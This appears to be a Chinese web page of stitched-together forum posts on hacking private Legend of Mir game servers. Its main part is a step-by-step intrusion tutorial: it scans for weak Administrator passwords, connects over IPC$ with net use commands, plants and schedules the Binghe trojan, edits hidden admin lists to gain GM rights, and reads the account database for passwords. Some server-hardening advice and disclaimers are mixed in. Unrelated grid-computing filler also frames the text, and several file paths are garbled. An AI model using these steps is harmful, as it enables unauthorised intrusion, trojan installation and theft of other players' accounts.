|
網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來(lái)的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體,實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲(chǔ)資源、數(shù)據(jù)資源、信息資源、知識(shí)資源、專家資源、大型數(shù)據(jù)庫(kù)、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。 前幾天,本私服也同樣遭受過(guò)黑客的攻擊!但是研究了幾次發(fā)現(xiàn)了漏洞的所在! 下面我先寫如何入侵計(jì)算機(jī)的,我用的是WINDOWS 2000 SEVER 1 X-SCAN掃描IP 看看誰(shuí)是弱口令(IP也非常容易得到,私服都有,弱口令就是用戶名和密碼都是系統(tǒng)默認(rèn)的,沒(méi)有改。) 2 打開(kāi)DOS系統(tǒng) 在DOS下進(jìn)行*作! c:/>net use \\192.168.0.1\ipc$ /user:administrator 進(jìn)入對(duì)方計(jì)算機(jī)USER進(jìn)入的就是管理員用戶。 進(jìn)入了以后就好辦了,可以找你要黑的私服!做GM也好,搞破壞刪除也好,比如做GM吧! c:/>copy \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 都是命令,可以看出來(lái),其余的想怎么改就憑你了,但是我得解釋一下!!這段代碼目的很簡(jiǎn)單就是將D盤拷貝一個(gè)傳奇GM的列表,你可以把你自己添加進(jìn)去在編輯! c:\>edit \\192.168.0.1\d$\mirserver\mir200\envir\adminlist.txt 這樣就可以了。這是利用弱口令進(jìn)入計(jì)算機(jī)的方法!!當(dāng)然了還有更多的方法。 我在講講我的 ** 傳奇的遭黑的經(jīng)歷! 首先,就是鼠標(biāo)亂動(dòng),很明顯就是被人控制了,分析如下:1,中木馬,2遠(yuǎn)程控制! 其次,有文件覆蓋的對(duì)話框,計(jì)算機(jī)被突然重新啟動(dòng)!!分析如下:1,破壞系統(tǒng),2,對(duì)傳奇的控制!3,從新啟動(dòng)是為了黑客的設(shè)置生效! 再次,有非法GM制造物品,以被查出。分析如下:是針對(duì)傳奇而來(lái)! 解決辦法:用殺毒軟件殺毒,最好在DOS下進(jìn)行!2,是2000的漏洞太多,查找無(wú)用的端口,并關(guān)閉3389等,下載 2000 SP3 的補(bǔ)丁!在控制面板中選本地用戶和組中關(guān)閉GUEST帳號(hào)!和 IUSR (計(jì)算機(jī)名)INTNERNET來(lái)賓帳號(hào)關(guān)閉(我的傳奇就是黑客利用這個(gè)號(hào)進(jìn)入計(jì)算機(jī)的),修改超級(jí)管理員用戶名與密碼! 在關(guān)閉遠(yuǎn)程訪問(wèn)等功能,另外,進(jìn)攻傳奇主要是GM列表,我同樣也中過(guò),現(xiàn)象是這樣的,打開(kāi)AdminList.txt文件,沒(méi)有發(fā)現(xiàn)多的GM,利用CTRL-A看看有沒(méi)有多余的GM,另外仔細(xì)一看,在看AdminList.TXT的文件名后面有沒(méi)有空格,設(shè)置文件全部顯示,會(huì)發(fā)現(xiàn)是否多了一個(gè)隱藏GM列表文件,這也是屢進(jìn)不止的發(fā)現(xiàn)有非法GM的原因.黑客進(jìn)攻我的計(jì)算機(jī)是用了2個(gè)小時(shí)就被我發(fā)現(xiàn)了,立即做了相應(yīng)的修改,恢復(fù)了傳奇的正常運(yùn)行,至今為止,仍然有人進(jìn)入我的來(lái)賓帳號(hào)的警告,但是已經(jīng)進(jìn)不來(lái)了!傳奇也步入了正常的運(yùn)行當(dāng)中! 雖然我寫了一些如何進(jìn)攻和防御計(jì)算機(jī)的方法和解決辦法,我自己也覺(jué)得有點(diǎn)自相矛盾的想法,但是我的目的很是簡(jiǎn)單,希望能夠幫助你解決你的問(wèn)題!提高自己計(jì)算機(jī)的安全 如何在別人的私服做GM? 攻擊初級(jí)教學(xué) 我在侵入別人4f所使用的方法 看到有些4f做的不錯(cuò),但是進(jìn)去又不是很有錢,也沒(méi)裝備,高手也很多,一直不喜歡在里面當(dāng)菜鳥(niǎo)的我,一口氣進(jìn)入他們的服務(wù)器端大鬧一番之后。當(dāng)足了gm的癮,現(xiàn)在我把方法公布與大家。。。。 其實(shí)我所使用的方法很簡(jiǎn)單,只有4個(gè)工具: (一):shed.exe (二)流光2000 (三)cmd.exe (其實(shí)就是2000下的dos啦)! (四)冰河8.4 操作系統(tǒng):win2000 server 或者winxp系統(tǒng)。 “shed.exe”:其實(shí)就是用來(lái)網(wǎng)上查共享資源的,速度快,可以查到很多服務(wù)斷的共項(xiàng)文件,不過(guò)在這里面有些ip在瀏覽器中無(wú)法訪問(wèn),這是因?yàn)槠渲幸舶藗(gè)人上網(wǎng)的ip.呵呵!一些作網(wǎng)站,網(wǎng)吧的服務(wù)器一些目錄都是共享的,有些是可以訪問(wèn),但是不能刪除,因?yàn)槟闼L問(wèn)的都是以匿名訪問(wèn)的,所以權(quán)限不夠!有些需要密碼。遇到密碼怎辦?用流光! “流光”雖說(shuō)對(duì)202作了限制,但是對(duì)小日本的ip可是沒(méi)有限制的,呵呵!所以說(shuō)使用流光的ipc探測(cè),建立一個(gè)空對(duì)話,查到用戶列表,然后先簡(jiǎn)單探測(cè),此時(shí)有些網(wǎng)管懶惰,把a(bǔ)dministrator設(shè)置的過(guò)于簡(jiǎn)單,呵呵,你就可以抓到了。 下一步如何做呢?也許在你查對(duì)方的端口時(shí)發(fā)現(xiàn)對(duì)方開(kāi)的端口很少,比如ftp沒(méi)開(kāi),怎辦呢?冰河! “冰河”,想必許多朋友都玩過(guò),使用冰河控制一臺(tái)服務(wù)器速度很快,(因?yàn)榉⻊?wù)器那邊帶寬很大)幾分鐘就可以查到對(duì)方主機(jī)的主頁(yè)所在位置。但是如何上傳并且控制他呢? “cmd.exe” 是2000下的dos了,執(zhí)行cmd.exe 使用net命令, [page_break] 具體操作如下: 第一步:net use \\ip\ipc$ “password” /user:”user” 說(shuō)明:以一個(gè)超級(jí)用戶名與你想黑的網(wǎng)站建立聯(lián)接,當(dāng)然超級(jí)用戶必須是該網(wǎng)站admin里的。這里的”ip”就是主機(jī)了,“password”就是超級(jí)用戶的密碼,“user”就是超級(jí)用戶。比如:net use \\210.248.250.2\ipc$ “maozhiie” /user:maozhijie 第二步:copy g-server.exe \\ip\admin$\system32 說(shuō)明:g-server.exe就是冰河的遠(yuǎn)程服務(wù)器端。意義:將此文件拷貝到對(duì)方的主機(jī)winnt里的system32目錄里。也許有人要問(wèn)木馬侵入對(duì)方那邊可以察覺(jué)出來(lái)的吧,呵呵!裝了防火墻估計(jì)可以,不過(guò)很多主機(jī)沒(méi)錢買呀!不像中國(guó)盜版滿天飛!如果你有最新的木馬也可以的!這是最好的了!!嘿嘿…… 第三步:net time \\ip 察看對(duì)方的服務(wù)器時(shí)間。由于有時(shí)差,應(yīng)該是一個(gè)小時(shí)吧!所以必須要以對(duì)方的服務(wù)器時(shí)間為準(zhǔn)。 第四步:at \\ip time g-server.exe 這里的time就是對(duì)方的主機(jī)時(shí)間。作用:在規(guī)定時(shí)間執(zhí)行該程序。比如 at \\210.248.250.2 19:55 g-server.exe 第五步:冰河就可以控制該電腦了。這個(gè)我就不說(shuō)了吧,呵呵!菜鳥(niǎo)也會(huì)玩的軟件。 這時(shí)我們就可以控制服務(wù)器了, net use * \\ip\*$ 遠(yuǎn)程映射 看這個(gè) mir.db里面有每個(gè)人的數(shù)據(jù),并且沒(méi)加密的,大家可以用 access找開(kāi)來(lái)改一下,改幾個(gè)極品,如0-80攻的木劍啊,0-50魔的六角戒指之類的,那就隨你的便了。只是這樣也太煩人了。呵呵。 比如武器,數(shù)據(jù)格式如下(全部是16進(jìn)制) ** ** ** ** ce 00 43 12 88 13 01 02 03 04 05 06 07 08 09 00 00 0a 前面**的是物品代碼,然后0xce 00 是武器代碼(高位在后),和物品db數(shù)據(jù)庫(kù)中對(duì)應(yīng), 例:物品數(shù)據(jù)庫(kù)中屠龍是序號(hào)(idx)是205,對(duì)應(yīng)到這里就是(205+1)轉(zhuǎn)為16進(jìn)制是ce 后面的 43 12是當(dāng)前持久度,88 13是最大持久度。 例:43 12換算成十進(jìn)制為17170,持久度為17 后面的01 02 03依次是攻擊、魔法、道術(shù)。 注意是在原武基礎(chǔ)上增加。 例:上面的屠龍顯示出來(lái)是攻擊:5-36,道術(shù):0-2,魔法:0-3。 后面的04 05 06 07 08 09依次是武器的 幸運(yùn)、詛咒、準(zhǔn)確、攻擊速度、強(qiáng)度。 后面兩個(gè)空位后緊跟的0x0a是表示武器是否被修煉,具體來(lái)說(shuō) 給武器加攻擊時(shí): 修煉前:00 修煉后:0a 試驗(yàn)成功后:00,攻擊值增加。 對(duì)于首飾和衣服,自己研究吧,這有好多人都知道的吧,我沒(méi)細(xì)寫。網(wǎng)上這方面的文章是有的,我就不用多說(shuō)了吧? 然后到, mirserver\mud2\logsrv\iddb下 這里有個(gè)id.db所有人的帳號(hào)和密碼都在了,你看著辦吧,不過(guò)偷人家的號(hào)也不是什么光榮的事,我是從來(lái)不做的,只是常常會(huì)拿gm的號(hào)來(lái)reload一下。呵呵 這里,我把你邊走邊看加到這個(gè)服務(wù)器的adminlist,呵呵,這里是打個(gè)比方,這里加入你的名字),然后,我們到mir.db中找出gm的帳號(hào),再到id.db中找出這個(gè)帳號(hào)的密碼。好了,ok了,用gm號(hào)進(jìn)入游戲(進(jìn)之前m一下他啊,不要讓人家發(fā)現(xiàn)了,也不要改人家的密碼,讓人家發(fā)現(xiàn)了多不好啊,呵呵)。打命令@reloadadmin。立刻out吧。 然后,把你加入adminlist的人物從adminlist里刪除,好了,你進(jìn)去游戲吧,你是gm了,可是真正的gm是不會(huì)從服務(wù)器端看到你的名字呢!!他也許在想“這里怎么了啊?好像還有個(gè)gm???”。呵呵,不過(guò)不要過(guò)火了,不然人家一個(gè)reload你的權(quán)限就沒(méi)了啊。 [page_break] 到這里大家做gm的夢(mèng)就完成了,下面我說(shuō)的就是怎么遠(yuǎn)程控制服務(wù)器主機(jī)了,比如給他關(guān)機(jī)啊重啟啊···· 私服技術(shù)我是一點(diǎn)都不懂。不過(guò)服務(wù)器安全方面還是略懂一二哦! 服務(wù)器入侵主要靠的是帳號(hào)與密碼。大家要先明白什么是系統(tǒng)帳號(hào)。什么是系統(tǒng)密碼! 其它WINDOWS每一個(gè)系統(tǒng)都有著他的超級(jí)管理員帳號(hào)與密碼! 一但這些被黑客掃描到的話,哪么你將會(huì)得到一個(gè)恐怕的威脅! 當(dāng)你私服是人氣高的時(shí)候。給黑客入侵的話,哪要是萬(wàn)一給刪了數(shù)據(jù)。到時(shí)候。真的是慘不忍堵。 一:了解一下帳號(hào)的含義 先運(yùn)行CMD 然后輸入:net user(回車健) 這樣后,會(huì)顯示一例帳號(hào) 再查看管理員帳號(hào) 輸入:net localgroup administrators 這就是查看administrators組的用戶。這樣的話若是人家用隱藏帳號(hào)的方法也會(huì)查出來(lái)! 系統(tǒng)自帶的超級(jí)管理員帳號(hào)是administrator 記住這里顯示出來(lái)多個(gè)帳號(hào)不明的帳號(hào)。哪就證明你機(jī)器不安全了。若出現(xiàn)在的帳號(hào)都是你自已的帳號(hào)。哪百分之四十你機(jī)器未被入侵 帳號(hào)安全: 二:密碼篇 你若覺(jué)得自已的帳號(hào)密碼是123456哪么不出三秒人家就到你機(jī)上一游了。 修改密碼方法,在DOS下修改更安全 輸入net user 帳號(hào)名 需修改密碼(然后回車健) 一般密碼設(shè)復(fù)雜一點(diǎn)! 溢出: 2000服務(wù)器版裝下去會(huì)自動(dòng)裝IIS的,若你覺(jué)得IIS沒(méi)有什么用就停止。IIS地址:開(kāi)始》》程序》》管理工具》》Internet信息服務(wù)(這個(gè)就是IIS)你將他開(kāi)啟。上面按停止!這樣就進(jìn)一步安全了。不過(guò)若IIS你需要用的話,哪么記得打目前最新的補(bǔ)丁SP4哦。 RPC溢出。大家記住,試試telnet IP 135看看有沒(méi)有開(kāi)著。若是開(kāi)著。請(qǐng)打RPC補(bǔ)丁。若找不到。干脆裝個(gè)防火墻,將135端屏蔽! 大家千萬(wàn)要記住。入侵系統(tǒng)最關(guān)點(diǎn)的就是要帳號(hào)密碼。保護(hù)好自已帳號(hào)與密碼。安全一定屬于你! [page_break] 入侵傳奇私服/充當(dāng)非法GM 首先,我得聲明,我寫本文并不是教大家如何去黑4f,只是想以本文引起廣大4f擁有者的注意 ,提高自己的網(wǎng)管水平。 我愛(ài)玩游戲,但卻玩得很菜,也沒(méi)有時(shí)間去玩,只想玩著過(guò)癮,所以,當(dāng)我開(kāi)始玩?zhèn)髌鏁r(shí), 雖覺(jué)得是好玩,但玩盛大的簡(jiǎn)直是在受罪,升級(jí)慢,沒(méi)好裝備,處處受人欺負(fù)。所以,4f是明 智的選擇,但進(jìn)去時(shí)也沒(méi)有好裝備,也是受人欺負(fù),難道我不可以做gm?試試,folling me! 找來(lái)一大堆4f的ip,開(kāi)個(gè)x-scan掃吧。有了,還真不少,都是弱口令的,這些網(wǎng)管真菜呀。 選好一個(gè),192.168.0.1,go! 打開(kāi)cmd, 1)c:/>net use 192.168.0.1ipc$ /user:administrator 連接成功, ok,連上了,成功在望, 2)c:/>copy 192.168.0.1d$mirservermir200enviradminlist.txt 系統(tǒng)找不到指定的文件。 沒(méi)有?不可能吧?唔,一定是隱藏了,沒(méi)關(guān)系,再來(lái), 3)c:>attrib -r -h 192.168.0.1d$mirservermir200enviradminlist.txt 沒(méi)有提示,成功了, 這次連復(fù)制也不用了,直接改吧, 4)c:>edit 192.168.0.1d$mirservermir200enviradminlist.txt 會(huì)打開(kāi)個(gè)介面,看看里面有哪些gm,加個(gè)吧,自己記得就行了,改完保存退出 5)c:>attrib +r +h 192.168.0.1d$mirservermir200enviradminlist.txt 把a(bǔ)dminilist.txt還原成只讀隱藏, 好了,大功告成,快打掃腳印吧,別讓人發(fā)現(xiàn)被入侵了, 現(xiàn)在,就等著系統(tǒng)重啟了,等不及的話就在第五步讓它重啟,不過(guò)這樣太危險(xiǎn)了,還是等吧, 第二天注冊(cè)個(gè)帳號(hào),新建個(gè)之前加的人名進(jìn)去, /who 當(dāng)前150人在線 哈,我就是gm了。趕快把自己升級(jí), @level -1 升級(jí)成功,255級(jí),哈哈 再造出想要的裝備,想要什么盡情造吧, 重復(fù)上面的把自己從adminlist.txt里刪了,哈哈,好裝備到手了,可以玩了 面記得有位朋友對(duì)加強(qiáng)對(duì)服務(wù)器安全性的解決方法進(jìn)行了一系列的說(shuō)明,講得非常詳細(xì),但是我覺(jué)得還有很多需要補(bǔ)充的地方.微軟的系統(tǒng)是漏洞和補(bǔ)丁著稱,真正要對(duì)服務(wù)器的安全配置確實(shí)非常困難,考慮的方面也太多了. 今天先講一個(gè)方面的內(nèi)容了,也算是對(duì)前面的朋友的進(jìn)一步補(bǔ)充吧! 前面那位朋友所概述的主要是針對(duì)WIN2000系統(tǒng)弱口令的安全設(shè)置!他已經(jīng)說(shuō)得很仔細(xì)了,做到那些,口令這一關(guān)差不多了.確實(shí)在互聯(lián)網(wǎng)的時(shí)代,口令真的非常重要.我對(duì)國(guó)外的主機(jī)進(jìn)行了一系列的測(cè)試,就拿有弱口令的系統(tǒng)來(lái)說(shuō),還有不少!其中也包括了不少中小型企業(yè)的WEB服務(wù)器,E-MAIL,PROXY服務(wù)器都有這種低級(jí)的錯(cuò)誤! 如果說(shuō)你在這方面做得非常的仔細(xì).但你至少還要仔細(xì)研究一下你主機(jī)現(xiàn)在所運(yùn)行的有哪些服務(wù),這些服務(wù)代表著什么?你應(yīng)該很清楚!因?yàn)楝F(xiàn)在黑客軟件,木馬工具,遠(yuǎn)程控制軟件大多是以一種服務(wù)的形式運(yùn)行在你的服務(wù)器系統(tǒng)里,一般的防火墻,殺毒軟件對(duì)其并沒(méi)有任何反映的.對(duì)于服務(wù)形式出現(xiàn)的控制工具.比較難得發(fā)現(xiàn),所以你就必須在服務(wù)器里運(yùn)行的哪些服務(wù)非常熟悉.對(duì)于陌生或奇怪的服務(wù)應(yīng)該安全設(shè)置好. 下面我都WIN2000的WWW(IIS)服務(wù)器安全配置略講一下,WWW服務(wù)在WIN2000SERVER,ADSERVER,DATACENTERSERVER,版本中是默認(rèn)安裝的,如果你不需要用2000的WWW服務(wù)的話,建議不要安裝.至于添加/刪除你可以控制面板的去掉他的安裝,或者在管理工具/服務(wù)里設(shè)置WORD WIDE WEB SERVICE啟動(dòng)類型為手動(dòng)/禁用 這樣的話系統(tǒng)就不默認(rèn)啟動(dòng)改服務(wù)! 如果你需要用IIS來(lái)建站宣傳一下自己的私服,你就必須按以下方法安全配置好IIS, 在IIS組件你首先要去掉你不需要的SMTP,SNNP,F(xiàn)TP,這樣的話你可以降低你服務(wù)器運(yùn)行所占用的CPU資源,和內(nèi)存使用率.然后建議你刪除你C:\INTERPUB\目錄下的所有內(nèi)容!或者更改路徑.在IIS管理器中刪除默認(rèn)站點(diǎn),(或者刪除SCRIPTS這個(gè)虛擬目錄)因?yàn)檫@個(gè)目錄有可寫的權(quán)限的.在新建的WEB站點(diǎn)中,設(shè)置IIS的權(quán)置,必須讓它不能寫入,或運(yùn)行.因?yàn)镮IS是默認(rèn)支持ASP腳本的.然后在IIS中刪除不需要的映射,這個(gè)很重要.如果你要支持PHP,CGI腳本的話,你還得配置好PHP.CGI的應(yīng)用程序的正確映射,禁用或刪除FSO組件,(去年深圳之窗就是被人家利用FSO黑了......)如果你要使用FSO的話,最好要改名!否則的話,你給別人提供主頁(yè)上傳的話,你肯定是會(huì)被黑的。小心呀! 目前在黑客橫行的互聯(lián)網(wǎng)空間中,利用IIS的漏洞,提申自己的權(quán)限,而成為AD,這些只是輕而易舉的事情,這不需要花幾天的時(shí)間去暴力破解一下口令,像自己架設(shè)的WEB服務(wù)器有種情況,更是數(shù)不甚數(shù)了.關(guān)于怎利用UNICODE漏洞去提供AD權(quán)限的文章,網(wǎng)上太多了,我就不多講了. 這些來(lái)說(shuō)應(yīng)該是服務(wù)器安全防范方面的一個(gè)例子而已,真正要做到服務(wù)器的安全運(yùn)行,需要你花大量的時(shí)間去摸索.因?yàn)檫@些來(lái)說(shuō),足以應(yīng)付一些無(wú)聊的.....當(dāng)然了,你如果需要WEB服務(wù)器,我還是建議你去使用AP了.他的源代碼開(kāi)發(fā),免費(fèi),安全性穩(wěn)定性都比IIS強(qiáng)得多了. 網(wǎng)絡(luò)的神奇作用吸引著越來(lái)越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來(lái)越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......,各項(xiàng)技術(shù)都需要適時(shí)應(yīng)勢(shì),對(duì)應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。 |
溫馨提示:喜歡本站的話,請(qǐng)收藏一下本站!
本站發(fā)布的Win7純凈版系統(tǒng)、Win10純凈版和XP純凈版系統(tǒng)僅為個(gè)人學(xué)習(xí)測(cè)試使用,請(qǐng)?jiān)谙螺d后24小時(shí)內(nèi)刪除,不得用于任何商業(yè)用途,否則后果自負(fù),請(qǐng)支持購(gòu)買微軟正版軟件!
本站所有資源全部來(lái)自于網(wǎng)絡(luò)資源,如侵犯到您的權(quán)益,請(qǐng)及時(shí)通知我們(),我們會(huì)及時(shí)處理.
Copyright © 2018-2020 蘿卜系統(tǒng) 手機(jī)站 關(guān)于本站
